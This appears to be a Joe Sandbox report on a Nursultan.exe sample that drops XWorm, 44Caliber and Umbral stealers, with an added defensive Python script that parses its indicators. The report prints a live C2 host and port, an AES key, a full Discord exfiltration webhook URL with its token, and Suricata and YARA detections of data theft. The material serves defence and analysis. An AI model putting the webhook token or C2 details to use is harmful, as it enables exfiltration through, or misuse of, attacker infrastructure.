                            Source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["stage-von.gl.at.ply.gg"], "Port": "19496", "Aes key": "234234", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                            Source: 11.0.Insidious.exe.24510880000.0.unpackMalware Configuration Extractor: 44Caliber Stealer {"Discord Webhook": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9\u0001Spidey Bot"}
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpackMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9", "Version": "v1.3"}
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Roaming\Microsoft EdgeReversingLabs: Detection: 83%
                            Source: Nursultan.exeReversingLabs: Detection: 81%
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Microsoft Edge | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Joe Sandbox ML: detected
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Joe Sandbox ML: detected
                            Source: Nursultan.exe | Joe Sandbox ML: detected
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: stage-von.gl.at.ply.gg
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: 19496
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: 234234
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: <Xwormmm>
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: XWorm V5.6
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: USB.exe
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: %AppData%
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | String decryptor: Microsoft Edge

                            Location Tracking

                            Source: unknown | DNS query: name: freegeoip.app
                            Source: Nursultan.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49707 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49716 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49719 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49721 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49723 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49725 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49727 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49730 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49732 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49735 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49739 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49742 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49748 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49749 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49750 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49751 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49754 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49756 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49758 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49759 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49763 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49765 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49766 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49770 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49771 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49773 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49774 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49776 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49778 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49780 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49781 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49784 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49786 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49788 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49790 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49799 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49800 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49804 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49806 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49808 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49809 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49813 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49817 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49821 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49824 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49826 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49831 version: TLS 1.2
                            Source: Nursultan.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mscorlib.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\maksi\Desktop\44CALIBER-main\44CALIBER\obj\Release\Insidious.pdb source: Insidious.exe, 0000000B.00000002.2166607567.00000245126B4000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr
                            Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp
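The signature rows on this page (the configuration-extractor rows above, and the Suricata, TCP and HTTP rows in the Networking section that follows) are flattened "Source / detector / value" cells. The Python script below is an added triage example; it is not part of the Joe Sandbox report and not code from any of the malware families it names. It parses rows of that shape, correlates the port in the extracted XWorm configuration with the raw TCP flow the sandbox recorded (the playit.gg tunnel hostname is what the 147.185.221.22:19496 connection resolves from), pulls the Discord webhook ID and token shared by the 44Caliber and Umbral configurations, and decodes the numeric `fields` mask in Umbral's ip-api.com request. The sample rows are copied from this report; the ip-api bit values are reproduced from that service's numeric-fields scheme and should be checked against its current documentation; `webhook_endpoints` only builds the URLs for Discord's token-authenticated webhook GET (inspect) and DELETE (revoke) calls and performs no network I/O.

```python
"""Added triage example for Joe Sandbox signature rows (not part of the report)."""
import json
import re
from collections import Counter

# Constructed input: rows copied from this report, with a " | " separator between the
# Source cell and the detector cell. The parser also accepts the fused form without it.
SAMPLE_ROWS = r"""
Source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["stage-von.gl.at.ply.gg"], "Port": "19496", "Aes key": "234234", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 11.0.Insidious.exe.24510880000.0.unpack | Malware Configuration Extractor: 44Caliber Stealer {"Discord Webhook": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9\u0001Spidey Bot"}
Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack | Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9", "Version": "v1.3"}
Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49732 -> 162.159.135.232:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 208.95.112.1:80
Source: global traffic | TCP traffic: 192.168.2.5:49728 -> 147.185.221.22:19496
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
"""

DETECTORS = "Malware Configuration Extractor|Suricata IDS|TCP traffic|HTTP traffic detected"
ROW_RE = re.compile(rf"^Source: (?P<source>.*?)\s*\|?\s*(?P<detector>{DETECTORS}): (?P<value>.*)$")
CONFIG_RE = re.compile(r"^(?P<family>.+?) (?P<blob>\{.*\})$")
WEBHOOK_RE = re.compile(r"https://discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)")
SURICATA_RE = re.compile(r"^(?P<sid>\d+) - Severity (?P<sev>\d) - (?P<msg>.+?) : (?P<src>\S+) -> (?P<dst>\S+)$")
FLOW_RE = re.compile(r"(?P<src>[\d.]+:\d+) -> (?P<dst>[\d.]+:\d+)")
# Host ends at whitespace, end of line, or a fused "Connection:" header.
HTTP_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.\d\s*Host: (?P<host>[A-Za-z0-9.-]+?)(?=Connection:|\s|$)")

# Bit values of ip-api.com's numeric "fields" parameter. Assumption: reproduced from the
# service's numeric-fields scheme; verify against the current docs before relying on it.
IP_API_FIELDS = {
    1: "country", 2: "countryCode", 4: "region", 8: "regionName", 16: "city", 32: "zip",
    64: "lat", 128: "lon", 256: "timezone", 512: "isp", 1024: "org", 2048: "as",
    4096: "reverse", 8192: "query", 16384: "status", 32768: "message", 65536: "mobile",
    131072: "proxy", 524288: "district", 1048576: "continent", 2097152: "continentCode",
    4194304: "asname", 8388608: "currency", 16777216: "hosting", 33554432: "offset",
}


def decode_ip_api_fields(mask: int) -> list[str]:
    """Expand a numeric ip-api.com fields mask into field names, lowest bit first."""
    names, bit = [], 1
    while bit <= mask:
        if mask & bit:
            names.append(IP_API_FIELDS.get(bit, f"unknown_bit_{bit}"))
        bit <<= 1
    return names


def extract_iocs(text: str) -> dict:
    """Walk report rows and collect network indicators by detector type."""
    iocs = {"c2": set(), "c2_ports": set(), "webhooks": {}, "suricata": {},
            "tcp": Counter(), "http": Counter()}
    for line in text.splitlines():
        row = ROW_RE.match(line.strip())
        if not row:
            continue
        detector, value = row["detector"], row["value"]
        if detector == "Malware Configuration Extractor":
            blob = CONFIG_RE.match(value)["blob"]
            cfg = json.loads(blob)
            hosts = cfg.get("C2 url", [])
            hosts = [hosts] if isinstance(hosts, str) else hosts
            port = cfg.get("Port")
            for host in hosts:
                if WEBHOOK_RE.search(host):  # Umbral's "C2 url" is a webhook, not a socket
                    continue
                iocs["c2"].add(f"{host}:{port}" if port else host)
                if port:
                    iocs["c2_ports"].add(int(port))
            for wid, token in WEBHOOK_RE.findall(blob):  # 44Caliber and Umbral share one webhook
                iocs["webhooks"][wid] = token
        elif detector == "Suricata IDS":
            hit = SURICATA_RE.match(value)
            iocs["suricata"][int(hit["sid"])] = (int(hit["sev"]), hit["msg"])
        elif detector == "TCP traffic":
            iocs["tcp"][FLOW_RE.search(value)["dst"]] += 1
        elif detector == "HTTP traffic detected":
            req = HTTP_RE.match(value)
            iocs["http"][(req["host"], req["path"])] += 1
    return iocs


def c2_matches(iocs: dict) -> list[str]:
    """TCP destinations whose port equals a configured C2 port (config-to-pcap correlation)."""
    return sorted(dst for dst in iocs["tcp"] if int(dst.rsplit(":", 1)[1]) in iocs["c2_ports"])


def webhook_endpoints(webhook_id: str, token: str) -> dict:
    """Discord's token-authenticated webhook calls: GET returns the webhook object (guild and
    channel IDs), DELETE revokes it. Both need only the token embedded in the stealer, so the
    exfil channel can be inspected and cut once evidence is preserved. No network I/O here."""
    url = f"https://discord.com/api/webhooks/{webhook_id}/{token}"
    return {"inspect": ("GET", url), "revoke": ("DELETE", url)}


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_ROWS)
    print("C2 sockets:", sorted(found["c2"]))
    print("Observed flows on a C2 port:", c2_matches(found))
    print("Webhook revoke requests:", {k: webhook_endpoints(k, v)["revoke"] for k, v in found["webhooks"].items()})
    print("Suricata SIDs:", found["suricata"])
    print("Geo-IP probes:", dict(found["http"]))
    print("ip-api fields=225545 ->", decode_ip_api_fields(225545))
```

Run it on the full report text instead of `SAMPLE_ROWS` to get the complete indicator set; the `c2_matches` result is the fact worth carrying into a block list, since the playit.gg hostname is a relay and the resolved address can change while the configured port stays fixed.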

                            Networking

                            Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49755 -> 162.159.136.232:443
                            Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49732 -> 162.159.135.232:443
                            Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49771 -> 162.159.135.232:443
                            Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49786 -> 162.159.135.232:443
                            Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49801 -> 162.159.136.232:443
                            Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49814 -> 162.159.138.232:443
                            Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49828 -> 162.159.137.232:443
                            Source: Malware configuration extractor | URLs: stage-von.gl.at.ply.gg
                            Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9
                            Source: Yara match | File source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Source: global traffic | TCP traffic: 192.168.2.5:49728 -> 147.185.221.22:19496
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com
                            Source: Joe Sandbox View | IP Address: 208.95.112.1
                            Source: Joe Sandbox View | IP Address: 188.114.97.3
                            Source: Joe Sandbox View | IP Address: 188.114.97.3
                            Source: Joe Sandbox View | ASN Name: TUT-ASUS
                            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                            Source: Joe Sandbox View | ASN Name: SALSGIVERUS
                            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknown | DNS query: name: ip-api.com
                            Source: unknown | DNS query: name: ip-api.com
                            Source: unknown | DNS query: name: ip-api.com
                            Source: unknown | DNS query: name: ip-api.com
                            Source: unknown | DNS query: name: ip-api.com
                            Source: unknown | DNS query: name: ip-api.com
                            Source: unknown | DNS query: name: ip-api.com
